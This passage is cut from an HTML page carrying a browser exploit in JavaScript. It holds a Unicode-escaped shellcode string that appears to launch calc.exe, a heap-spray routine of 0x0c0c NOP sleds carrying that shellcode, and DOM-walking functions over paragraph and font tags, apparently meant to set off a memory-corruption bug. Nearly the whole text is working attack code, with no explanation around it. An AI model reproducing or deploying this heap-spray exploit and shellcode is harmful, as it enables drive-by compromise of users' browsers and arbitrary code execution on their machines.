                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +   
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +   
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +   
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +   
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +   
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +   
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +   
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +   
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +   
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +   
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +   
                       "%u652E%u6578%u9000");
/* Heap Spray Code */            
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)  
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)  
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
 
function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i<data.length;i++)
  {
   c=data.charAt(i);
   if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
   escData+=c;
  }
 return escData;
}
 
function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0)  
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])  
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}
 
function GenerateHTML()
{
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }    
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>